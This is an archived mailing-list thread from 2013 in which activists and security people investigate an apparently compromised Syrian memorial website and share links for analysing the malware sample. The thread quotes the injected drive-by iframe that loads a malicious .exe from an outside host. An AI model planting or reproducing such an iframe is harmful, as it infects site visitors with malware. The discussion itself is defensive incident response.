Search Mailing List Archives


Limit search to: Subject & Body Subject Author
Sort by: Reverse Sort
Limit to: All This Week Last Week This Month Last Month
Select Date Range     through    

[liberationtech] Syrian-martyrs.com website probably compromised by virus

SiNA Rabbani sina at redteam.io
Tue Jan 29 15:00:07 PST 2013


Hi!

I sent the malware to a couple of friends that have a setup ready. If
you want to try this it might be fun:
http://docs.cuckoosandbox.org/en/latest/

All the best,
SiNA


KheOps:
> Hey,
> 
> Le 29/01/2013 23:34, SiNA Rabbani a écrit :
>> This is the malware:
>>> https://www.virustotal.com/file/cfdd3a78a895b3f49a39402eb28b0d2134cc3086849a41a6fdfe7d829a0d4dcd/analysis/
> 
> Yes, saw that too.
> 
> However, I don't find any precise description of its behaviour. Like,
> what it does, if it opens any port, sends data to a C&C or whatever.
> 
> I have downloaded it there:
> https://resources.telecomix.ceops.eu/material/malwares/
> 
> All the best,
> 
>>
>>
>> --SiNA
>>
>>
>>
>> SiNA
>>
>> Rabbani:
>>> holly shit:
>>
>>> <iframe name="I1" width="10" height="10" 
>>> src="http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe"
>>
>>
>> border="0"
>>> frameborder="0">
>>
>>
>>> :/ if you are running windows don't even go there!!!
>>
>>
>>> Andrew Lewis:
>>>> I can get to this in 6 hours or so, maybe someone is willing to 
>>>> jump on this before then?
>>
>>>> -Andrew
>>
>>>> On Jan 30, 2013, at 11:06 AM, KheOps <kheops at ceops.eu> wrote:
>>
>>>>> Dear Libtech,
>>>>>
>>>>> We just saw that the website : http://www.syrian-martyrs.com
>>>>> is probably compromised. Every page of the website contains an 
>>>>> iFrame which links to a .exe file which is detected as a virus
>>>>> by antivirus software: 
>>>>> http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe
>>>>>
>>>>>
>>>>>
>>
>>>>>
>> The fact that the HTML code is present at the bottom of each page makes
>>>>> me think that the "index.php" page has been changed in a way
>>>>> that makes that iFrame appear on every page of the website,
>>>>> after the dynamic content.
>>>>>
>>>>> It also probably means that the attackers have some kind of 
>>>>> access to the server. My guess would be going to a PHP shell,
>>>>> but I'm no expert in this.
>>>>>
>>>>> Any help, clue, investigation, would be very welcome :)
>>>>>
>>>>> Thank you, KheOps
>>>>>
>>>>> -- Unsubscribe, change to digest, or change password at: 
>>>>> https://mailman.stanford.edu/mailman/listinfo/liberationtech
>>>> -- Unsubscribe, change to digest, or change password at: 
>>>> https://mailman.stanford.edu/mailman/listinfo/liberationtech
>>
>>
>>
>>
>>
>> --
>> Unsubscribe, change to digest, or change password at: https://mailman.stanford.edu/mailman/listinfo/liberationtech
>>
> 
> 
> 
> --
> Unsubscribe, change to digest, or change password at: https://mailman.stanford.edu/mailman/listinfo/liberationtech
> 


-- 
“Be the change you want to see in the world.” Gandhi

OTR: inf0 at jabber.ccc.de
a5dae15f45a37e9768f6deae7b54807fc4942ec9



More information about the liberationtech mailing list